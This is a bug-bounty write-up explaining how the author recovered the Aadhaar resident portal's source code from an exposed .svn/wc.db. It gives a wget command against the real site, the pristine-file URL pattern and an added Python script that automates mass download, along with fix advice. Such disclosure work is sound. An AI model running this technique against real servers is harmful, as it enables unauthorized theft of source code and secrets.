India’s Aadhar card source code disclosure via exposed .svn/wc.db
2023-1-15 11:5:43 Author: infosecwriteups.com

Hi guys, I recently found a .svn/wc.db file exposed on resident.uidai.gov.in and used it to reconstruct the web app's source code. I could not find any article about SVN, so this will be very useful for those who find an exposed .svn on a website.

What is .svn/wc.db?

The .svn/wc.db file is the SQLite database that Subversion (1.7 and later) keeps in the .svn directory at the root of a working copy. It records the state of the working copy: every versioned path, its kind (file or directory), the revision it was checked out at, the dates and times when it was last updated, the SHA-1 checksum of each file's pristine (unmodified) content, and any local modifications. Subversion uses it to track changes to the files in the working copy and to manage merging changes from the repository into the working copy. Because it is a plain SQLite file, anyone who can download it can read the complete list of versioned files and their checksums.

What is the difference between .svn/wc.db and .git?

.svn/wc.db is a single SQLite database used by Subversion, a centralized VCS. Since SVN 1.7 there is one .svn directory at the top of the working copy holding wc.db and a pristine/ store; older versions instead put a .svn directory with a text-base/ folder in every subdirectory.

.git, on the other hand, is not a single file but a directory used by Git, a distributed VCS. It contains the object store (loose objects and packfiles), refs, HEAD and the index. An exposed .git is reconstructed by walking objects starting from HEAD; an exposed .svn is reconstructed by reading wc.db and fetching the pristine copies it points to.

Note: I haven't used any directory or file brute-forcing. I used a Chrome extension called DotGit, which automatically detects exposed .git and .svn directories on websites while you browse.

Let's look at how I downloaded all the source code of the Aadhar website.

I just appended .svn/wc.db to https://resident.uidai.gov.in and downloaded the database file:

wget https://resident.uidai.gov.in/.svn/wc.db

When I opened the database file with SQLite browser, I came across a lot of tables.

sqlitebrowser wc.db

The nodes table has many columns, but the two that matter here are "local_relpath" and "checksum":

local_relpath → the path of the file, relative to the root of the working copy (here, the web root)

checksum → the SHA-1 checksum of the file's content, stored as $sha1$ followed by the 40-character hex digest (directory rows have a NULL checksum)

For Example:

local_relpath = /Bio-Lock-Enable.php

checksum = $sha1$c7fb9f76455733203cb734de0c6016366d729458

I know that SVN keeps a pristine (unmodified) copy of every versioned file in one location, named by its checksum:

.svn/pristine/<XX>/<CHECKSUM>.svn-base
  1. CHECKSUM is the SHA-1 sum of the file (the hex digest after $sha1$).
  2. XX is the first two characters of CHECKSUM.
For the example above, that gives:
https://resident.uidai.gov.in/.svn/pristine/c7/c7fb9f76455733203cb734de0c6016366d729458.svn-base

Requesting this path returns the raw source: the web server treats a .svn-base file as static content instead of handing it to PHP, whereas a request for /Bio-Lock-Enable.php only returns the script's output. The SHA-1 of the downloaded bytes should equal CHECKSUM; a mismatch means the pristine store and wc.db are out of sync.

It is easy to download a single file with wget, but I had more than 500 paths, so I wrote a simple script to download all the source code.

link to the below code ↓

https://gist.github.com/0xLittleSpidy/d57446737071f119f452d5bc95721864

(Screenshot: script to download all the source code)
(Screenshot: downloaded source code)
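Here is a worked version of that download step, added as an example for this write-up; it is neither the author's gist nor code from the site. It assumes the SVN 1.7+ layout described above (a nodes table with local_relpath, op_depth, kind and checksum columns, and pristine copies at .svn/pristine/<XX>/<SHA1>.svn-base). The base URL https://example.invalid/, the wc.db it builds and the file contents are constructed fixtures so it runs offline; none of it is data from resident.uidai.gov.in. It goes a little beyond the page's single-file example: every download is verified against the checksum recorded in wc.db, a missing pristine is reported instead of aborting the run, and a path that would escape the output directory is refused.

```python
"""Rebuild a web app's source tree from an exposed Subversion .svn/wc.db.

Added example, not the original post's script. Assumes the SVN 1.7+ layout:
wc.db 'nodes' rows with local_relpath/op_depth/kind/checksum and pristine
copies at .svn/pristine/<XX>/<SHA1>.svn-base.
"""
import hashlib
import os
import sqlite3
import tempfile
import urllib.request

SHA1_PREFIX = "$sha1$"
BASE_URL = "https://example.invalid/"  # hypothetical target used by the fixture


def pristine_relpath(checksum):
    """'$sha1$<40 hex>' -> '.svn/pristine/<XX>/<sha1>.svn-base' (XX = first two hex chars)."""
    if not checksum.startswith(SHA1_PREFIX):
        raise ValueError("unexpected checksum format: %r" % checksum)
    digest = checksum[len(SHA1_PREFIX):].lower()
    if len(digest) != 40 or not all(c in "0123456789abcdef" for c in digest):
        raise ValueError("not a SHA-1 hex digest: %r" % digest)
    return ".svn/pristine/%s/%s.svn-base" % (digest[:2], digest)


def list_files(db_path):
    """{local_relpath: checksum} for every versioned file in wc.db. Directories have
    no checksum, and a path may have several rows (one per op_depth when it was
    replaced or moved), so only the deepest row is kept."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT local_relpath, checksum FROM nodes "
            "WHERE kind = 'file' AND checksum IS NOT NULL "
            "ORDER BY local_relpath, op_depth DESC").fetchall()
    finally:
        con.close()
    files = {}
    for relpath, checksum in rows:
        files.setdefault(relpath, checksum)
    return files


def http_fetch(url):
    """Default fetcher: a plain GET returning the body bytes."""
    with urllib.request.urlopen(url, timeout=20) as resp:
        return resp.read()


def recover_sources(base_url, db_path, out_dir, fetch=http_fetch):
    """Fetch every pristine copy named in wc.db, check it against the recorded SHA-1
    and write it under out_dir at its original relative path.
    Returns {local_relpath: 'ok' | 'checksum-mismatch' | 'error: ...'}."""
    base_url = base_url.rstrip("/") + "/"
    out_root = os.path.realpath(out_dir)
    results = {}
    for relpath, checksum in list_files(db_path).items():
        try:
            body = fetch(base_url + pristine_relpath(checksum))
        except Exception as exc:  # 404, timeout, odd checksum: record it and go on
            results[relpath] = "error: %s" % exc
            continue
        if hashlib.sha1(body).hexdigest() != checksum[len(SHA1_PREFIX):].lower():
            results[relpath] = "checksum-mismatch"  # pristine store and wc.db disagree
            continue
        # Paths come from the attacker-readable wc.db; never let one such as
        # '../x' write outside out_dir.
        dest = os.path.realpath(os.path.join(out_root, relpath.lstrip("/")))
        if not dest.startswith(out_root + os.sep):
            results[relpath] = "error: path escapes output dir"
            continue
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "wb") as fh:
            fh.write(body)
        results[relpath] = "ok"
    return results


def build_fixture(work_dir):
    """Constructed fixture: a wc.db with the subset of the nodes schema used above,
    plus a dict standing in for the server's pristine store. Contents are made up."""
    files = {"index.php": b"<?php echo 'hello'; ?>\n",
             "includes/db.php": b"<?php $dsn = 'mysql:host=localhost'; ?>\n"}
    db_path = os.path.join(work_dir, "wc.db")
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE nodes (local_relpath TEXT, op_depth INTEGER, kind TEXT, checksum TEXT)")
    con.execute("INSERT INTO nodes VALUES ('', 0, 'dir', NULL)")
    con.execute("INSERT INTO nodes VALUES ('includes', 0, 'dir', NULL)")
    store = {}
    for relpath, content in files.items():
        checksum = SHA1_PREFIX + hashlib.sha1(content).hexdigest()
        con.execute("INSERT INTO nodes VALUES (?, 0, 'file', ?)", (relpath, checksum))
        store[BASE_URL + pristine_relpath(checksum)] = content
    # Failure modes: a pristine whose bytes no longer match wc.db, and one that is gone.
    stale = SHA1_PREFIX + hashlib.sha1(b"original").hexdigest()
    con.execute("INSERT INTO nodes VALUES ('old.php', 0, 'file', ?)", (stale,))
    store[BASE_URL + pristine_relpath(stale)] = b"tampered"
    con.execute("INSERT INTO nodes VALUES ('missing.php', 0, 'file', ?)",
                (SHA1_PREFIX + hashlib.sha1(b"gone").hexdigest(),))
    con.commit()
    con.close()
    return db_path, store


def demo():
    """Run the recovery offline against the fixture; returns the result map."""
    with tempfile.TemporaryDirectory() as tmp:
        db_path, store = build_fixture(tmp)

        def fake_fetch(url):
            if url not in store:
                raise IOError("404 " + url)
            return store[url]

        return recover_sources(BASE_URL, db_path, os.path.join(tmp, "out"), fake_fetch)


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print("%-20s %s" % (path, status))
```

Against a real target you would download wc.db with wget as above and call recover_sources(base_url, "wc.db", "out") with the default fetcher. On the defensive side the same layout explains the fix: deploy with svn export rather than a checkout so no .svn directory reaches the web root, and deny requests for /.svn/ (and /.git/) at the web server regardless.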

Finally, I got the complete source code of the Aadhar website.

The Indian government has fixed the issue and I encourage ethical hacking practices.

Here are some more good resources:

Special thanks to Dinesh Kumar for guiding me.

Thanks for taking the time to read my write-up.

Want to Connect? Please consider following me on Medium, and Twitter, connecting with me on LinkedIn, or buying me a coffee!


Source: https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761?source=rss----7b722bfd1b8d--bug_bounty